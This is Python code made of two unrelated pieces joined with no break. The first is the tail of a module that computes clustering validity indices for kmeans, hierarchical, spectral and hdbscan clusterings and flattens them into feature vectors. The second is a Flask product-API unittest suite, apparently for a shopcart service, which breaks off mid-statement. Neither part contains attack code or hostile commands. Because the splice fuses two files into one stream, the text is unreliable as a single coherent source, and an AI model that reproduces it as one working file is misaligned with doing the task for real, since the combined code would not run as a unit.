'Log-SS-Ratio', ## 'Scott-Symons', 'Silhouette', # 'Trace-WiB', # 'C', 'Dunn', # 'Davies-Bouldin', # 'Ray-Turi', # 'PBM', 'Score', ], 'external_indices' : [ 'Entropy', 'Purity', 'Precision', 'Recall', 'F', 'Weighted-F', 'Folkes-Mallows', 'Rand', 'Adjusted-Rand', 'Adjusted-Mutual-Info', 'Normalized-Mutual-Info', 'Homogeneity', 'Completeness', 'V-Measure', 'Jaccard', 'Hubert Γ̂', 'Kulczynski', # 'McNemar', 'Phi', 'Russel-Rao', 'Rogers-Tanimoto', 'Sokal-Sneath1', 'Sokal-Sneath2', ], } FEATURE_VECTOR_CLUSTER_INDICES_ORDER_TRIPLES = [ # ('kmeans', 'internal_indices', 'WGSS'), # ('kmeans', 'internal_indices', 'BGSS'), # ('kmeans', 'internal_indices', 'Ball-Hall'), # ('kmeans', 'internal_indices', 'Banfeld-Raftery'), # ('kmeans', 'internal_indices', 'Calinski-Harabasz'), # ('kmeans', 'internal_indices', 'Det-Ratio'), # ('kmeans', 'internal_indices', 'Ksq-DetW'), # ('kmeans', 'internal_indices', 'Log-Det-Ratio'), # ('kmeans', 'internal_indices', 'Log-SS-Ratio'), ## ('kmeans', 'internal_indices', 'Scott-Symons'), ('kmeans', 'internal_indices', 'Silhouette'), # ('kmeans', 'internal_indices', 'Trace-WiB'), ('kmeans', 'internal_indices', 'C'), ('kmeans', 'internal_indices', 'Dunn'), # ('kmeans', 'internal_indices', 'Davies-Bouldin'), # ('kmeans', 'internal_indices', 'Ray-Turi'), # ('kmeans', 'internal_indices', 'PBM'), ('kmeans', 'internal_indices', 'Score'), ('kmeans', 'external_indices', 'Entropy'), ('kmeans', 'external_indices', 'Purity'), ('kmeans', 'external_indices', 'Precision'), ('kmeans', 'external_indices', 'Recall'), ('kmeans', 'external_indices', 'F'), ('kmeans', 'external_indices', 'Weighted-F'), ('kmeans', 'external_indices', 'Folkes-Mallows'), ('kmeans', 'external_indices', 'Rand'), ('kmeans', 'external_indices', 'Adjusted-Rand'), ('kmeans', 'external_indices', 'Adjusted-Mutual-Info'), ('kmeans', 'external_indices', 'Normalized-Mutual-Info'), ('kmeans', 'external_indices', 'Homogeneity'), ('kmeans', 'external_indices', 'Completeness'), ('kmeans', 'external_indices', 'V-Measure'), ('kmeans', 'external_indices', 'Jaccard'), ('kmeans', 'external_indices', 'Hubert Γ̂'), ('kmeans', 'external_indices', 'Kulczynski'), # ('kmeans', 'external_indices', 'McNemar'), ('kmeans', 'external_indices', 'Phi'), ('kmeans', 'external_indices', 'Russel-Rao'), ('kmeans', 'external_indices', 'Rogers-Tanimoto'), ('kmeans', 'external_indices', 'Sokal-Sneath1'), ('kmeans', 'external_indices', 'Sokal-Sneath2'), # ('hierarchical', 'internal_indices', 'WGSS'), # ('hierarchical', 'internal_indices', 'BGSS'), # ('hierarchical', 'internal_indices', 'Ball-Hall'), # ('hierarchical', 'internal_indices', 'Banfeld-Raftery'), # ('hierarchical', 'internal_indices', 'Calinski-Harabasz'), # ('hierarchical', 'internal_indices', 'Det-Ratio'), # ('hierarchical', 'internal_indices', 'Ksq-DetW'), # ('hierarchical', 'internal_indices', 'Log-Det-Ratio'), # ('hierarchical', 'internal_indices', 'Log-SS-Ratio'), ## ('hierarchical', 'internal_indices', 'Scott-Symons'), ('hierarchical', 'internal_indices', 'Silhouette'), # ('hierarchical', 'internal_indices', 'Trace-WiB'), ('hierarchical', 'internal_indices', 'C'), ('hierarchical', 'internal_indices', 'Dunn'), # ('hierarchical', 'internal_indices', 'Davies-Bouldin'), # ('hierarchical', 'internal_indices', 'Ray-Turi'), # ('hierarchical', 'internal_indices', 'PBM'), ('hierarchical', 'internal_indices', 'Score'), ('hierarchical', 'external_indices', 'Entropy'), ('hierarchical', 'external_indices', 'Purity'), ('hierarchical', 'external_indices', 'Precision'), ('hierarchical', 'external_indices', 'Recall'), ('hierarchical', 'external_indices', 'F'), ('hierarchical', 'external_indices', 'Weighted-F'), ('hierarchical', 'external_indices', 'Folkes-Mallows'), ('hierarchical', 'external_indices', 'Rand'), ('hierarchical', 'external_indices', 'Adjusted-Rand'), ('hierarchical', 'external_indices', 'Adjusted-Mutual-Info'), ('hierarchical', 'external_indices', 'Normalized-Mutual-Info'), ('hierarchical', 'external_indices', 'Homogeneity'), ('hierarchical', 'external_indices', 'Completeness'), ('hierarchical', 'external_indices', 'V-Measure'), ('hierarchical', 'external_indices', 'Jaccard'), ('hierarchical', 'external_indices', 'Hubert Γ̂'), ('hierarchical', 'external_indices', 'Kulczynski'), # ('hierarchical', 'external_indices', 'McNemar'), ('hierarchical', 'external_indices', 'Phi'), ('hierarchical', 'external_indices', 'Russel-Rao'), ('hierarchical', 'external_indices', 'Rogers-Tanimoto'), ('hierarchical', 'external_indices', 'Sokal-Sneath1'), ('hierarchical', 'external_indices', 'Sokal-Sneath2'), # ('spectral', 'internal_indices', 'WGSS'), # ('spectral', 'internal_indices', 'BGSS'), # ('spectral', 'internal_indices', 'Ball-Hall'), # ('spectral', 'internal_indices', 'Banfeld-Raftery'), # ('spectral', 'internal_indices', 'Calinski-Harabasz'), # ('spectral', 'internal_indices', 'Det-Ratio'), # ('spectral', 'internal_indices', 'Ksq-DetW'), # ('spectral', 'internal_indices', 'Log-Det-Ratio'), # ('spectral', 'internal_indices', 'Log-SS-Ratio'), ## ('spectral', 'internal_indices', 'Scott-Symons'), ('spectral', 'internal_indices', 'Silhouette'), # ('spectral', 'internal_indices', 'Trace-WiB'), ('spectral', 'internal_indices', 'C'), ('spectral', 'internal_indices', 'Dunn'), ('spectral', 'internal_indices', 'Davies-Bouldin'), ('spectral', 'internal_indices', 'Ray-Turi'), # ('spectral', 'internal_indices', 'PBM'), ('spectral', 'internal_indices', 'Score'), ('spectral', 'external_indices', 'Entropy'), ('spectral', 'external_indices', 'Purity'), ('spectral', 'external_indices', 'Precision'), ('spectral', 'external_indices', 'Recall'), ('spectral', 'external_indices', 'F'), ('spectral', 'external_indices', 'Weighted-F'), ('spectral', 'external_indices', 'Folkes-Mallows'), ('spectral', 'external_indices', 'Rand'), ('spectral', 'external_indices', 'Adjusted-Rand'), ('spectral', 'external_indices', 'Adjusted-Mutual-Info'), ('spectral', 'external_indices', 'Normalized-Mutual-Info'), ('spectral', 'external_indices', 'Homogeneity'), ('spectral', 'external_indices', 'Completeness'), ('spectral', 'external_indices', 'V-Measure'), ('spectral', 'external_indices', 'Jaccard'), ('spectral', 'external_indices', 'Hubert Γ̂'), ('spectral', 'external_indices', 'Kulczynski'), # ('spectral', 'external_indices', 'McNemar'), ('spectral', 'external_indices', 'Phi'), ('spectral', 'external_indices', 'Russel-Rao'), ('spectral', 'external_indices', 'Rogers-Tanimoto'), ('spectral', 'external_indices', 'Sokal-Sneath1'), ('spectral', 'external_indices', 'Sokal-Sneath2'), # ('hdbscan', 'internal_indices', 'WGSS'), # ('hdbscan', 'internal_indices', 'BGSS'), # ('hdbscan', 'internal_indices', 'Ball-Hall'), # ('hdbscan', 'internal_indices', 'Banfeld-Raftery'), # ('hdbscan', 'internal_indices', 'Calinski-Harabasz'), # ('hdbscan', 'internal_indices', 'Det-Ratio'), # ('hdbscan', 'internal_indices', 'Ksq-DetW'), # ('hdbscan', 'internal_indices', 'Log-Det-Ratio'), ('hdbscan', 'internal_indices', 'Log-SS-Ratio'), ## ('hdbscan', 'internal_indices', 'Scott-Symons'), ('hdbscan', 'internal_indices', 'Silhouette'), # ('hdbscan', 'internal_indices', 'Trace-WiB'), # ('hdbscan', 'internal_indices', 'C'), ('hdbscan', 'internal_indices', 'Dunn'), # ('hdbscan', 'internal_indices', 'Davies-Bouldin'), # ('hdbscan', 'internal_indices', 'Ray-Turi'), # ('hdbscan', 'internal_indices', 'PBM'), ('hdbscan', 'internal_indices', 'Score'), ('hdbscan', 'external_indices', 'Entropy'), ('hdbscan', 'external_indices', 'Purity'), ('hdbscan', 'external_indices', 'Precision'), ('hdbscan', 'external_indices', 'Recall'), ('hdbscan', 'external_indices', 'F'), ('hdbscan', 'external_indices', 'Weighted-F'), ('hdbscan', 'external_indices', 'Folkes-Mallows'), ('hdbscan', 'external_indices', 'Rand'), ('hdbscan', 'external_indices', 'Adjusted-Rand'), ('hdbscan', 'external_indices', 'Adjusted-Mutual-Info'), ('hdbscan', 'external_indices', 'Normalized-Mutual-Info'), ('hdbscan', 'external_indices', 'Homogeneity'), ('hdbscan', 'external_indices', 'Completeness'), ('hdbscan', 'external_indices', 'V-Measure'), ('hdbscan', 'external_indices', 'Jaccard'), ('hdbscan', 'external_indices', 'Hubert Γ̂'), ('hdbscan', 'external_indices', 'Kulczynski'), # ('hdbscan', 'external_indices', 'McNemar'), ('hdbscan', 'external_indices', 'Phi'), ('hdbscan', 'external_indices', 'Russel-Rao'), ('hdbscan', 'external_indices', 'Rogers-Tanimoto'), ('hdbscan', 'external_indices', 'Sokal-Sneath1'), ('hdbscan', 'external_indices', 'Sokal-Sneath2'), ] def generate_kmeans_cluster_indices(dataset, choosen_indices, n_jobs=None): cluster_labels = dataset.perform_kmeans_clustering(n_clusters='n_classes', n_jobs=n_jobs) internal_indices_values = dict() internal_validation = InternalIndices(dataset.data, cluster_labels) choosen_internal_indices = choosen_indices['internal_indices'] for internal_index in choosen_internal_indices: internal_index_method = getattr(internal_validation, INTERNAL_INDICES_METHOD_NAMES_DICT[internal_index]) internal_indices_values[internal_index] = internal_index_method() external_indices_values = dict() external_validation = ExternalIndices(dataset.target, cluster_labels) choosen_external_indices = choosen_indices['external_indices'] for external_index in choosen_external_indices: external_index_method = getattr(external_validation, EXTERNAL_INDICES_METHOD_NAMES_DICT[external_index]) external_indices_values[external_index] = external_index_method() indices_values = { 'internal_indices' : internal_indices_values, 'external_indices' : external_indices_values, } return indices_values def generate_hierarchical_cluster_indices(dataset, choosen_indices, n_jobs=None): cluster_labels = dataset.perform_hierarchical_clustering(n_clusters='n_classes') internal_indices_values = dict() internal_validation = InternalIndices(dataset.data, cluster_labels) choosen_internal_indices = choosen_indices['internal_indices'] for internal_index in choosen_internal_indices: internal_index_method = getattr(internal_validation, INTERNAL_INDICES_METHOD_NAMES_DICT[internal_index]) internal_indices_values[internal_index] = internal_index_method() external_indices_values = dict() external_validation = ExternalIndices(dataset.target, cluster_labels) choosen_external_indices = choosen_indices['external_indices'] for external_index in choosen_external_indices: external_index_method = getattr(external_validation, EXTERNAL_INDICES_METHOD_NAMES_DICT[external_index]) external_indices_values[external_index] = external_index_method() indices_values = { 'internal_indices' : internal_indices_values, 'external_indices' : external_indices_values, } return indices_values def generate_spectral_cluster_indices(dataset, choosen_indices, n_jobs=None): cluster_labels = dataset.perform_spectral_clustering(n_clusters='n_classes', n_jobs=n_jobs) internal_indices_values = dict() internal_validation = InternalIndices(dataset.data, cluster_labels) choosen_internal_indices = choosen_indices['internal_indices'] for internal_index in choosen_internal_indices: internal_index_method = getattr(internal_validation, INTERNAL_INDICES_METHOD_NAMES_DICT[internal_index]) internal_indices_values[internal_index] = internal_index_method() external_indices_values = dict() external_validation = ExternalIndices(dataset.target, cluster_labels) choosen_external_indices = choosen_indices['external_indices'] for external_index in choosen_external_indices: external_index_method = getattr(external_validation, EXTERNAL_INDICES_METHOD_NAMES_DICT[external_index]) external_indices_values[external_index] = external_index_method() indices_values = { 'internal_indices' : internal_indices_values, 'external_indices' : external_indices_values, } return indices_values def generate_hdbscan_cluster_indices(dataset, choosen_indices, n_jobs=None): cluster_labels = dataset.perform_hdbscan_clustering(core_dist_n_jobs=(n_jobs if n_jobs is not None else 4)) internal_indices_values = dict() internal_validation = InternalIndices(dataset.data, cluster_labels) choosen_internal_indices = choosen_indices['internal_indices'] for internal_index in choosen_internal_indices: internal_index_method = getattr(internal_validation, INTERNAL_INDICES_METHOD_NAMES_DICT[internal_index]) internal_indices_values[internal_index] = internal_index_method() external_indices_values = dict() external_validation = ExternalIndices(dataset.target, cluster_labels) choosen_external_indices = choosen_indices['external_indices'] for external_index in choosen_external_indices: external_index_method = getattr(external_validation, EXTERNAL_INDICES_METHOD_NAMES_DICT[external_index]) external_indices_values[external_index] = external_index_method() indices_values = { 'internal_indices' : internal_indices_values, 'external_indices' : external_indices_values, } return indices_values def bag_generate_cluster_indices(bag_filename, n_jobs=1): """ Perform clustering on the bags and generate cluster indices evaluating the quality of clusters """ bag_index = extract_bag_index(bag_filename) dataset = read_bag_file(bag_filename) logger.info("Bag %2d : performing kmeans clustering, generating cluster indices", bag_index) kmeans_cluster_indices = generate_kmeans_cluster_indices(dataset, KMEANS_CHOOSEN_CLUSTER_INDICES, n_jobs=n_jobs) logger.info("Bag %2d : performing hierarchical clustering, generating cluster indices", bag_index) hierarchical_cluster_indices = generate_hierarchical_cluster_indices(dataset, HIERARCHICAL_CHOOSEN_CLUSTER_INDICES, n_jobs=n_jobs) logger.info("Bag %2d : performing spectral clustering, generating cluster indices", bag_index) spectral_cluster_indices = generate_spectral_cluster_indices(dataset, SPECTRAL_CHOOSEN_CLUSTER_INDICES, n_jobs=n_jobs) logger.info("Bag %2d : performing hdbscan clustering, generating cluster indices", bag_index) hdbscan_cluster_indices = generate_hdbscan_cluster_indices(dataset, HDBSCAN_CHOOSEN_CLUSTER_INDICES, n_jobs=n_jobs) cluster_indices = { 'kmeans' : kmeans_cluster_indices, 'hierarchical' : hierarchical_cluster_indices, 'spectral' : spectral_cluster_indices, 'hdbscan' : hdbscan_cluster_indices, } return cluster_indices def convert_cluster_indices_to_features(cluster_indices): """ Convert the cluster indices into a flat feature vector """ feature_vector = list(map( lambda keys_triple: cluster_indices[keys_triple[0]][keys_triple[1]][keys_triple[2]], FEATURE_VECTOR_CLUSTER_INDICES_ORDER_TRIPLES )) feature_vector = np.array(feature_vector) return feature_vector
""" Product API Service Test Suite Test cases can be run with the following: nosetests -v --with-spec --spec-color coverage report -m """ import os import logging from unittest import TestCase from unittest.mock import patch from flask_api import status # HTTP Status Codes from service.models import db from service.service import app, init_db, internal_server_error from tests.product_factory import ProductFactory SHOPCART_ENDPOINT = os.getenv('SHOPCART_ENDPOINT', 'http://localhost:5000/shopcarts') ###################################################################### # T E S T C A S E S ###################################################################### class TestProductServer(TestCase): """ REST API Server Tests """ @classmethod def setUpClass(cls): """ This runs once before the entire test suite """ init_db() app.debug = False app.testing = True app.config["SQLALCHEMY_DATABASE_URI"] = app.config["TEST_DATABASE_URI"] @classmethod def tearDownClass(cls): """ This runs once after the entire test suite """ db.session.close() def setUp(self): """ This runs before each test """ self.app = app.test_client() db.drop_all() # clean up the last tests db.create_all() # create new tables def tearDown(self): """ This runs after each test """ db.session.remove() db.drop_all() def _create_products(self, count): """ Factory method to create products in bulk """ products = [] for _ in range(count): test_product = ProductFactory() resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="application/json" ) self.assertEqual( resp.status_code, status.HTTP_201_CREATED, "Could not create test product" ) new_product = resp.get_json() test_product.id = new_product["id"] products.append(test_product) return products ###################################################################### # P L A C E T E S T C A S E S H E R E ###################################################################### def test_index(self): """ Test index call """ resp = self.app.get("/") self.assertEqual(resp.status_code, status.HTTP_200_OK) def test_create_product(self): """ Create a new Product """ test_product = ProductFactory() logging.debug(test_product) resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="application/json" ) self.assertEqual(resp.status_code, status.HTTP_201_CREATED) location = resp.headers.get("Location", None) self.assertIsNotNone(location) # Check the data is correct new_product = resp.get_json() self.assertEqual(new_product["name"], test_product.name, "Names do not match") self.assertEqual( new_product["category"], test_product.category, "Categories do not match" ) self.assertEqual( new_product["description"], test_product.description, "Descriptions do not match" ) self.assertEqual( new_product["price"], test_product.price, "Prices do not match" ) resp = self.app.get(location) self.assertEqual(resp.status_code, status.HTTP_200_OK) new_product = resp.get_json() self.assertEqual(new_product["name"], test_product.name, "Names do not match") self.assertEqual( new_product["category"], test_product.category, "Categories do not match" ) self.assertEqual( new_product["description"], test_product.description, "Descriptions do not match" ) self.assertEqual( new_product["price"], test_product.price, "Prices do not match" ) def test_create_product_with_invalid_content_type(self): """ Create a new Product with invalid content type""" test_product = ProductFactory() logging.debug(test_product) resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="text/plain" ) self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE) def test_create_product_with_bad_request(self): """ Create a new Product with bad request""" test_product = ProductFactory() logging.debug(test_product) test_product.category = "" resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="application/json" ) self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) def test_get_product(self): """ Get a single product by its ID """ # get the id of a product test_product = self._create_products(1)[0] resp = self.app.get("/api/products/{}".format(test_product.id)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(data["name"], test_product.name) def test_get_product_not_found(self): """ Get a product that's not found """ resp = self.app.get("/api/products/0") self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) def test_get_product_bad_request(self): """ Get a product with invalid product id """ resp = self.app.get("/api/products/a") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) resp = self.app.get("/api/products/3.3") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) def test_delete_a_product(self): """ Delete a Product """ test_product = self._create_products(1)[0] resp = self.app.delete("/api/products/{}".format(test_product.id)) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) self.assertEqual(len(resp.data), 0) # make sure they are deleted resp = self.app.get("/api/products/{}".format(test_product.id)) self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) def test_delete_product_bad_request(self): """ Get a product with invalid product id """ resp = self.app.delete("/api/products/a") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) resp = self.app.delete("/api/products/3.3") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) def test_update_product(self): """ Update an existing Product """ # create a product to update test_product = ProductFactory() test_product_name = test_product.name test_product_description = test_product.description test_product_price = test_product.price resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_201_CREATED) # update the product new_product = resp.get_json() new_product["category"] = "Education" resp = self.app.put( "/api/products/{}".format(new_product["id"]), json=new_product, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_200_OK) updated_product = resp.get_json() self.assertEqual(updated_product["category"], "Education") # create an update request with partial information part_product = resp.get_json() part_product["category"] = "" resp = self.app.put( "/api/products/{}".format(part_product["id"]), json=part_product, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_200_OK) updated_product = resp.get_json() self.assertEqual(updated_product["category"], "Education") part_product = resp.get_json() part_product["name"] = "" resp = self.app.put( "/api/products/{}".format(part_product["id"]), json=part_product, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_200_OK) updated_product = resp.get_json() self.assertEqual(updated_product["name"], test_product_name) part_product = resp.get_json() part_product["description"] = "" resp = self.app.put( "/api/products/{}".format(part_product["id"]), json=part_product, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_200_OK) updated_product = resp.get_json() self.assertEqual(updated_product["description"], test_product_description) part_product = resp.get_json() part_product["price"] = "" resp = self.app.put( "/api/products/{}".format(part_product["id"]), json=part_product, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_200_OK) updated_product = resp.get_json() self.assertEqual(updated_product["price"], test_product_price) def test_update_product_not_found(self): """ Update a product that's not found """ test_product = ProductFactory() resp = self.app.put( "/api/products/0", json=test_product.serialize(), content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) def test_update_product_bad_request(self): """ Update a product with bad request body """ # create a product to update test_product = ProductFactory() resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_201_CREATED) # create an update request with bad request body new_product = resp.get_json() resp = self.app.put( "/api/products/a", json=new_product, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) resp = self.app.put( "/api/products/3.3", json=new_product, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) test_product = ProductFactory() test_product_name = test_product.name test_product_description = test_product.description test_product_price = test_product.price resp = self.app.post( "/api/products", json=test_product.serialize(), content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_201_CREATED) # update the product new_product = resp.get_json() new_product["price"] = "a" resp = self.app.put( "/api/products/{}".format(new_product["id"]), json=new_product, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) def test_get_product_list(self): """ Get a list of Products """ self._create_products(5) resp = self.app.get("/api/products") self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), 5) def test_query_product_list_by_category(self): """ Query Products by Category """ products = self._create_products(10) test_category = products[0].category category_products = [product for product in products if product.category == test_category] resp = self.app.get("/api/products", query_string="category={}".format(test_category)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(category_products)) # check the data just to be sure for product in data: self.assertEqual(product["category"], test_category) def test_query_product_list_by_name(self): """ Query Products by Name """ products = self._create_products(10) test_name = products[0].name name_products = [product for product in products if product.name == test_name] resp = self.app.get("/api/products", query_string="name={}".format(test_name)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(name_products)) # check the data just to be sure for product in data: self.assertEqual(product["name"], test_name) def test_query_product_list_by_description(self): """ Query Products by Description """ products = self._create_products(10) test_description = products[0].description description_products = [product for product in products if product.description == test_description] resp = self.app.get("/api/products", query_string="description={}".format(test_description)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(description_products)) # check the data just to be sure for product in data: self.assertEqual(product["description"], test_description) def test_query_product_by_price(self): """ Query Products by Price Range """ products = self._create_products(10) test_max_price = products[0].price * 10 test_min_price = products[0].price / 10 price_products = [product for product in products if product.price >= test_min_price and product.price <= test_max_price] resp = self.app.get("/api/products", query_string="minimum={}&maximum={}".format(test_min_price, test_max_price)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(price_products)) def test_query_product_list_by_name_category(self): """ Query Products by Name and Category """ products = self._create_products(10) test_name = products[0].name test_category = products[0].category name_category_products = [product for product in products if product.name == test_name and product.category == test_category] resp = self.app.get("/api/products", query_string="name={}&category={}".format(test_name, test_category)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(name_category_products)) # check the data just to be sure for product in data: self.assertEqual(product["name"], test_name) self.assertEqual(product["category"], test_category) def test_query_product_list_by_name_description(self): """ Query Products by Name and Description """ products = self._create_products(10) test_name = products[0].name test_description = products[0].description name_description_products = [product for product in products if product.name == test_name and product.description == test_description] resp = self.app.get("/api/products", query_string="name={}&description={}".format(test_name, test_description)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(name_description_products)) # check the data just to be sure for product in data: self.assertEqual(product["name"], test_name) self.assertEqual(product["description"], test_description) def test_query_product_by_name_price(self): """ Query Products by Name and Price """ products = self._create_products(10) test_name = products[0].name test_max_price = products[0].price * 10 test_min_price = products[0].price / 10 name_price_products = [product for product in products if product.name == test_name and product.price >= test_min_price and product.price <= test_max_price] resp = self.app.get("/api/products", query_string="name={}&minimum={}&maximum={}".format(test_name, test_min_price, test_max_price)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(name_price_products)) # check the data just to be sure for product in data: self.assertEqual(product["name"], test_name) def test_query_product_list_by_category_description(self): """ Query Products by Category and Description """ products = self._create_products(10) test_category = products[0].category test_description = products[0].description category_description_products = [product for product in products if product.category == test_category and product.description == test_description] resp = self.app.get("/api/products", query_string="category={}&description={}".format(test_category, test_description)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(category_description_products)) # check the data just to be sure for product in data: self.assertEqual(product["category"], test_category) self.assertEqual(product["description"], test_description) def test_query_product_by_category_price(self): """ Query Products by Category and Price """ products = self._create_products(10) test_category = products[0].category test_max_price = products[0].price * 10 test_min_price = products[0].price / 10 category_price_products = [product for product in products if product.category == test_category and product.price >= test_min_price and product.price <= test_max_price] resp = self.app.get("/api/products", query_string="category={}&minimum={}&maximum={}".format(test_category, test_min_price, test_max_price)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(category_price_products)) # check the data just to be sure for product in data: self.assertEqual(product["category"], test_category) def test_query_product_by_description_price(self): """ Query Products by Description and Price """ products = self._create_products(10) test_description = products[0].description test_max_price = products[0].price * 10 test_min_price = products[0].price / 10 description_price_products = [product for product in products if product.description == test_description and product.price >= test_min_price and product.price <= test_max_price] resp = self.app.get("/api/products", query_string="description={}&minimum={}&maximum={}".format(test_description, test_min_price, test_max_price)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(description_price_products)) # check the data just to be sure for product in data: self.assertEqual(product["description"], test_description) def test_query_product_by_name_category_description(self): """ Query Products by Name, Category and Description """ products = self._create_products(10) test_name = products[0].name test_category = products[0].category test_description = products[0].description name_category_description_products = [product for product in products if product.name == test_name and product.category == test_category and product.description == test_description] resp = self.app.get("/api/products", query_string="name={}&category={}&description={}".format(test_name, test_category, test_description)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(name_category_description_products)) # check the data just to be sure for product in data: self.assertEqual(product["name"], test_name) self.assertEqual(product["category"], test_category) self.assertEqual(product["description"], test_description) def test_query_product_by_name_category_price(self): """ Query Products by Name, Category and Price """ products = self._create_products(10) test_name = products[0].name test_category = products[0].category test_max_price = products[0].price * 10 test_min_price = products[0].price / 10 name_category_price_products = [product for product in products if product.name == test_name and product.category == test_category and product.price >= test_min_price and product.price <= test_max_price] resp = self.app.get("/api/products", query_string="name={}&category={}&minimum={}&maximum={}".format(test_name, test_category, test_min_price, test_max_price)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(name_category_price_products)) # check the data just to be sure for product in data: self.assertEqual(product["name"], test_name) self.assertEqual(product["category"], test_category) def test_query_product_by_name_description_price(self): """ Query Products by Name, Description and Price """ products = self._create_products(10) test_name = products[0].name test_description = products[0].description test_max_price = products[0].price * 10 test_min_price = products[0].price / 10 name_description_price_products = [product for product in products if product.name == test_name and product.description == test_description and product.price >= test_min_price and product.price <= test_max_price] resp = self.app.get("/api/products", query_string="name={}&description={}&minimum={}&maximum={}".format(test_name, test_description, test_min_price, test_max_price)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(name_description_price_products)) # check the data just to be sure for product in data: self.assertEqual(product["name"], test_name) self.assertEqual(product["description"], test_description) def test_query_product_by_category_description_price(self): """ Query Products by Category, Description and Price """ products = self._create_products(10) test_category = products[0].category test_description = products[0].description test_max_price = products[0].price * 10 test_min_price = products[0].price / 10 category_description_price_products = [product for product in products if product.category == test_category and product.description == test_description and product.price >= test_min_price and product.price <= test_max_price] resp = self.app.get("/api/products", query_string="category={}&description={}&minimum={}&maximum={}".format(test_category, test_description, test_min_price, test_max_price)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(category_description_price_products)) # check the data just to be sure for product in data: self.assertEqual(product["category"], test_category) self.assertEqual(product["description"], test_description) def test_query_product_by_name_category_description_price(self): """ Query Products by Name, Category, Description and Price """ products = self._create_products(10) test_name = products[0].name test_category = products[0].category test_description = products[0].description test_max_price = products[0].price * 10 test_min_price = products[0].price / 10 name_category_description_price_products = [ product for product in products if product.name == test_name and product.category == test_category and product.description == test_description and product.price >= test_min_price and product.price <= test_max_price] resp = self.app.get("/api/products", query_string="name={}&category={}&description={}&minimum={}&maximum={}".format(test_name, test_category, test_description, test_min_price, test_max_price)) self.assertEqual(resp.status_code, status.HTTP_200_OK) data = resp.get_json() self.assertEqual(len(data), len(name_category_description_price_products)) # check the data just to be sure for product in data: self.assertEqual(product["name"], test_name) self.assertEqual(product["category"], test_category) self.assertEqual(product["description"], test_description) def test_query_product_by_price_bad_request(self): """ Query Products by Invalid Price Range """ products = self._create_products(10) test_max_price = products[0].price * 10 test_min_price = products[0].price / 10 resp = self.app.get("/api/products", query_string="minimum={}".format(test_min_price)) self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) resp = self.app.get("/api/products", query_string="maximum={}".format(test_max_price)) self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST) def test_purchase_product_shopcart_exists(self): '''Purchase a Product Shopcart Exists Successfully''' user_id = 101 with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [{"create_time": "2020-11-15T19:36:28.302839","id": 6,"update_time": "2020-11-15T19:36:28.302839","user_id": 101}] with patch('service.service.add_item_to_shopcart') as post_shopcart_item_mock: post_shopcart_item_mock.return_value.status_code=201 json = {"user_id": user_id, "amount": 4} product = self._create_products(1) resp = self.app.post("/api/products/{}/purchase".format(product[0].id), json=json, content_type="application/json") self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertEqual(resp.data, b'{"message":"Product successfully added into the shopping cart"}\n') def test_purchase_product_shopcart_no_exist(self): '''Purchase a Product Shopcart Doesn't Exist Successfully''' user_id = 101 with patch('requests.get') as get_shopcart_by_userid_mock: get_shopcart_by_userid_mock.return_value.status_code = 200 get_shopcart_by_userid_mock.return_value.json.return_value = [] with patch('service.service.create_shopcart') as create_shopcart_mock: create_shopcart_mock.return_value.status_code=201 with patch('service.service.add_item_to_shopcart') as 